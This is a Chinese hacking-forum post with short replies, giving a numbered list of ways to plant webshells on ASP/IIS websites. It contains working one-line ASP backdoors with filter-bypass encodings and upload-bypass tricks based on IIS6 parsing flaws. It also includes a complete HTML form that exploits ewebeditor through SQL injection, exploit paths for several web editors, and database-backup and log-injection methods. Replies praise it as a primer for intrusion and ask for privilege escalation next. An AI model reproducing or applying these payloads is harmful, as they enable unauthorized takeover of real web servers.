返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式9 P% m3 v+ A+ ^) ]* A+ F6 `
* e/ l, u) S8 E* w+ j
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp2 ~  J9 f1 S$ T. u# f$ R
: L, S9 j/ C- y, J0 e! f; h7 o- D
3.上传漏洞:
5 Y0 ?4 a% m8 G  F0 ^" ^: x% A% z
6 p) C( V! |4 [+ V: J动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x000 Q# g' l$ u5 G3 l% a9 t! w5 l

; T/ V8 b( J7 }) A8 P逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件: U2 f1 ^' H8 J9 a
* \8 Y) _& h& ~( V' F& D( W% z; `
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
1 f4 p! _/ r2 I4 t/ ]* \' o然后在上传文件里面填要传的图片格式的ASP木马( P) r; f  [; {, D6 O+ B$ h4 b
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp9 I9 c4 M2 B0 r1 T5 Y/ ^+ F
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传% h5 |: ^" M0 u; G
8 t) `( E% J. p; S) s3 i( G
<html>9 g# _/ B# P2 T& t) B8 J. d
<head>
; w/ d) N! p) X1 v<title>ewebeditor upload.asp上传利用</title>- `; J( H4 m! x- @4 N2 Z
</head>  P2 L7 [& [' [( S+ B! I% {4 }2 Z
<body>0 Z/ c8 h1 ^/ q0 c
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">! F; U1 y  O2 ^7 H& R2 H3 L
<input type=file name=uploadfile size=100><br><br>  }* e: u  U! [) L( m8 q
<input type=submit value=Fuck>
/ f1 Q; G  a8 u, `3 L5 o0 v' w. i</form>
9 f. R' e5 z/ R* g</body>
) l  ]: d" j, f4 k</form>
* H8 V( C% b% [, m+ f</html>
( _, U( r- a1 {
8 |" a. U5 `+ r; d& \2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
; J3 n- q7 p) R/ n( v/ [; \5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp0 p8 \  d( I! |* Q0 c6 Q7 Y

  B: {, _8 Y+ d: `利用windows2003解析。建立zjq.asp的文件夹
! j1 V  q! q, c  D/ s+ q! ~" F; }3 x- g: |6 ?" _
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型1 @6 N. m. Q7 ^4 K$ A

" C/ Q4 a' X: R2 [. b, C7.cuteeditor:类似ewebeditor
0 R1 v# z$ U' a7 M3 L+ d0 W# _8 Z* B' E6 K, G/ s5 Z
8.htmleditor:同上
( t# C" ]1 I( |/ g- ~% o8 J( {9 P8 B3 F: T2 j/ B& F( R3 }& M7 \
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
. o% ^3 }& I; g. l0 V: y3 v% P* k0 O
7 }% J( u# J. m3 T& Z3 V! p<%execute request("value")%><%'<% loop <%:%>
' n' ]! t! Z3 Z% I5 g5 \. o; g1 n: S+ ?$ s: e8 N
<%'<% loop <%:%><%execute request("value")%>
6 _6 s% F! f+ O( g4 c
' I# s! a9 h( }* ~0 e<%execute request("value")'<% loop <%:%>& y2 k% {3 |3 w
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
, A+ p. f$ J- d1 b2 L+ M( ]. F
3 X! Y& n$ z/ {6 B; ?10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞# ^. t+ v, ?, K4 h; t' O
- _- C' R! m6 A( j  V5 w; z
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
6 Y! ^- x, B) s' Q6 x
, F/ S' |5 N6 P) ?解析漏洞得到webshell
1 G1 m6 D! c4 ^1 l
6 L1 t6 {* M- z( e12.mssql差异备份,日志备份,前提需知道web路径
( z/ [7 p- m9 k$ {$ D. i. C! \# [' h1 M* |
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell$ Y' E- n& j3 A
. F  b5 g; P) r
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
# [. U" m) d; J* r* q, _3 U8 W2 t. ~: L. }4 ]1 V" J' C
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
2 k8 J, ~0 o. D% ]! c7 X! L* d  ~$ U
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
& i$ o$ Q; c6 O5 [  W$ H2 V不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 : C' P4 r  M; K( N4 X6 Q7 V5 a
8 {0 M0 A) X  o7 Z

) \) o% k8 W4 p% E( H3 a很好啊、基本的入侵方法都包含了% Z/ q& X& U' O  o4 `* s
2 c! k4 g6 k6 F. Q' Z2 k& M; c' J2 ?' ^0 K
最好来个提权的帖子再。) G& ^! Z3 L- ^& E4 s" ]
* A9 K5 c. u; c3 g5 X% D
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表